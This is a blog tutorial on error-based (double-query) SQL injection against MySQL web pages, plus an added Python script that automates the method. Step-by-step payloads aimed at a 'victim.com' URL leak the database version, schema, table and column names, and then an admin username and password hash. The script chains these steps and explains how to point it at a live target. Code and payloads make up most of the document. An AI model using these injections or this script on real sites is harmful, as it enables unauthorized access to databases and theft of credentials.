Friday, 19 February 2016

Error based/Double Query SQL Injection


Error Based/Double Query

In the previous part we looked at String based SQL Injection; in this part I will describe how to exploit the Error Based/Double Query technique.

1/ What is Error Based?
It is a technique for pulling data out of the database when the usual functions such as UNION SELECT do not work: instead of reading the result of the query from the page, you force the database to raise an error whose message contains the value you want.
Error Based = Double Query (error based with a second, nested SELECT): every payload below embeds a second SELECT that fetches one value, and an outer GROUP BY that turns that value into a "Duplicate entry" error.

2/ When Error Based/Double Query can be used
a.  The used SELECT statements have a different number of columns (the UNION is rejected).
b.  "Unknown column 1", or no column marker shows up at all (neither in the page nor in the page source), so a UNION result never gets rendered.
c.  Error #1604
In every case the precondition is the same: the back end is MySQL and its error messages are echoed into the HTTP response, because the leaked data travels inside the error text. If errors are suppressed, this technique does not apply and you fall back to blind injection.

3/ Exploitation:
Step 1: Get the version
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

Example:
Code:
http://victim.com/index.php?mode=getpagecontent&pageID=24 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

(In a URL write the comment terminator as --+ or -- - so that the space MySQL requires after -- survives.)

Result: Duplicate entry '5.1.56-log:1' for key 'group_key'
--> The database is MySQL 5.1.56 (0x3a is ':', used here as the separator between the version string and the trailing digit).
Why this errors: rand(0) is a seeded generator, so floor(rand(0)*2) always produces the sequence 0,1,1,0,1,1,... While MySQL fills the temporary table for GROUP BY, the key "5.1.56-log:1" is inserted on the second row and inserted again on the third row; that violates the temporary table's unique key and MySQL reports the colliding key, and with it the value of version(), in the Duplicate entry message. The table being grouped needs at least three rows for the collision to occur (here the page's own table); that is why the payloads below group over information_schema.tables, which always has plenty.

Step 2: Get the database name
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Example:
http://victim.com/index.php?mode=getpagecontent&pageID=24 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'iqbal_iqbal~1' for key 'group_key'

--> Database: iqbal_iqbal
0x7e is '~'; it is appended as a marker so the value is easy to separate from the trailing 0/1 digit produced by floor(rand(0)*2).
A site may have access to several databases, but database() only ever returns the current one, so raising LIMIT in this payload changes nothing. To list the others, put schema_name from information_schema.schemata in the inner SELECT and step LIMIT 0,1; LIMIT 1,1; ... until no error comes back; you will only see the schemas the application's MySQL account is allowed to read.

Step 3: Get the table names
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


Example:
http://victim.com/index.php?mode=getpagecontent&pageID=24 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'Seting~1' for key 'group_key'
--> Table: Seting
To walk the tables, raise LIMIT one step at a time until the page stops returning a Duplicate entry error (the inner SELECT then returns no row, and a NULL key never collides).
LIMIT N,1 (where N is the row offset, a non-negative integer starting at 0). The example above used LIMIT 19,1, i.e. the twentieth table in the schema. Table names worth looking for are typically admin, tbladmin, user, administrator, setting, ...
Limit 0,1
Limit 1,1
Limit 2,1
Limit 3,1


Step 4: Get the columns of a table
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Note the two placeholders, TABLEHEX and LIMIT.
TABLEHEX is the table name written as a MySQL hex literal, so that no quote characters are needed in the payload. The examples below use 0x73657474696e6773, which decodes to "settings" (the hex of "Seting", as found in step 3, would be 0x536574696e67); whatever table name step 3 returned must be hex-encoded exactly as returned. Because the condition is on table_name alone, the query will also match a table of the same name in another schema the account can see; add "and table_schema=database()" if that causes confusion.
As before, raise LIMIT one step at a time until the interesting columns (username, password) show up.

Example:
http://victim.com/index.php?mode=getpagecontent&pageID=24 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'Id~1' for key 'group_key'
Continue raising LIMIT:

http://victim.com/index.php?mode=getpagecontent&pageID=24 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'userName~1' for key 'group_key'

   Column_name: userName
http://victim.com/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'passWord~1' for key 'group_key'

  Column_name: passWord


Step 5: Get the data from the columns
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Replace the following placeholders:
       1.     COLUMN_NAME: the column(s) you want to extract; joining two columns with 0x7e ('~') leaks a whole row per request
       2.     Databasename: the current database name found in step 2, so the data is read from it
        3.     TABLENAME: the table whose columns you listed in step 4
        4.     LIMIT N,1: N is the row offset, starting at 0 and increased by one per request

COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"


http://victim.com/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Result: Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key 'group_key'


Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
The password value is 32 hex characters, i.e. a 128-bit digest, almost certainly an unsalted MD5 hash rather than a clear-text password; it has to be cracked offline before it can be used.
Two limits of this technique worth knowing: the inner SELECT must return exactly one row (hence LIMIT N,1, never a bare SELECT over the table), and MySQL truncates the key it prints in the Duplicate entry message to 64 characters, so a longer value has to be fetched in pieces with substr().
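The five steps above are really one loop: build the inner SELECT for the value you want, wrap it in the GROUP BY / rand(0) trick, read the value out of the Duplicate entry message, and raise LIMIT until the error stops. The script below is an added example written for this page, not code from the original post; it automates that loop in Python against a constructed stand-in for the vulnerable page (the FAKE_DB contents and the victim.com host are assumptions lifted from the page's examples), so it runs offline. Against a real target you would replace fake_target with a function that performs the HTTP request (for example with requests.get) and returns the response body, URL-encoding the spaces in the payload.

```python
import re
from typing import Callable, List, Optional

# Assumed injection point, shaped like the page's URL (hypothetical host).
BASE_URL = "http://victim.com/index.php?mode=getpagecontent&pageID=24"


def to_hex(s: str) -> str:
    """MySQL hex literal for a string, so the payload needs no quote characters."""
    return "0x" + s.encode().hex()


def leak_select(expr: str, source: str = "", where: str = "", offset: int = 0) -> str:
    """Inner one-row SELECT: the value cast to char, followed by 0x7e ('~') as a marker."""
    q = "select concat(cast(" + expr + " as char),0x7e)"
    if source:
        q += " from " + source
        if where:
            q += " where " + where
        q += " limit %d,1" % offset
    return q


def double_query(scalar_select: str) -> str:
    """Wrap the inner SELECT in the GROUP BY / floor(rand(0)*2) trick.
    rand(0) is seeded, so floor(rand(0)*2) gives 0,1,1,0,1,1,...; while MySQL
    fills the GROUP BY temporary table from information_schema.tables the key
    '<value>~1' is inserted on the 2nd and again on the 3rd row, and the
    duplicate-key error that results carries the leaked value in its text."""
    return (" and (select 1 from (select count(*),concat((" + scalar_select +
            "),floor(rand(0)*2))x from information_schema.tables group by x)a)")


DUP_RE = re.compile(r"Duplicate entry '(.*?)' for key")


def parse_leak(body: str, sep: str = "~") -> Optional[str]:
    """Pull the leaked value out of a response body; None when no error was raised."""
    m = DUP_RE.search(body)
    if not m:
        return None
    value = m.group(1)
    # Drop the trailing floor(rand(0)*2) digit that follows the marker.
    return value.rsplit(sep, 1)[0] if sep in value else value


def enumerate_values(fetch: Callable[[str], str],
                     make_select: Callable[[int], str], max_rows: int = 64) -> List[str]:
    """Step LIMIT N,1 upward until the page stops raising Duplicate entry.
    Past the last row the inner SELECT yields NULL, concat() is NULL for every
    group and no key collides, so the page renders normally and we stop."""
    out: List[str] = []
    for n in range(max_rows):
        value = parse_leak(fetch(BASE_URL + double_query(make_select(n))))
        if value is None:
            break
        out.append(value)
    return out


# Constructed stand-in for the vulnerable page so the loop runs offline; the
# contents mirror the page's examples and are assumptions, not real data.
FAKE_DB = {
    "tables": ["pages", "Seting"],
    "columns": {"settings": ["Id", "userName", "passWord"]},
    "rows": {"settings": [("admin", "86f574c1d63d53fa804c13c3213953d9")]},
}
LIMIT_RE = re.compile(r"limit (\d+),1")


def fake_target(url: str) -> str:
    """Answer the way a MySQL-backed page showing its errors would."""
    m = LIMIT_RE.search(url)
    offset = int(m.group(1)) if m else 0
    if "information_schema.columns" in url:
        hexname = re.search(r"table_name=0x([0-9a-fA-F]+)", url).group(1)
        rows = FAKE_DB["columns"].get(bytes.fromhex(hexname).decode(), [])
    elif "information_schema.tables where" in url:
        rows = FAKE_DB["tables"]
    else:
        t = re.search(r"from (\w+)\.(\w+) limit", url)
        rows = ["~".join(r) for r in FAKE_DB["rows"].get(t.group(2), [])] if t else []
    if offset >= len(rows):
        return "<html>normal page content</html>"
    return "<html>Duplicate entry '%s~1' for key 'group_key'</html>" % rows[offset]


def run_extraction(fetch: Callable[[str], str] = fake_target):
    """Steps 3 to 5 of the page, chained: tables, then columns, then rows."""
    tables = enumerate_values(fetch, lambda n: leak_select(
        "table_name", "information_schema.tables", "table_schema=database()", n))
    columns = enumerate_values(fetch, lambda n: leak_select(
        "column_name", "information_schema.columns", "table_name=" + to_hex("settings"), n))
    rows = enumerate_values(fetch, lambda n: leak_select(
        "concat(userName,0x7e,passWord)", "iqbal_iqbal.settings", "", n))
    return tables, columns, rows


if __name__ == "__main__":
    print(run_extraction())
```

The stop condition in enumerate_values is the practical check that the page's "raise LIMIT until you find it" leaves implicit: once the offset is past the last row the response is the ordinary page again, with no error, which is how you know the listing is complete. The parse_leak separator argument handles the version payload from step 1 as well, which uses ':' (0x3a) instead of '~'.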

Previous part: String based SQL Injection
In the next part I will cover Blind SQL Injection.
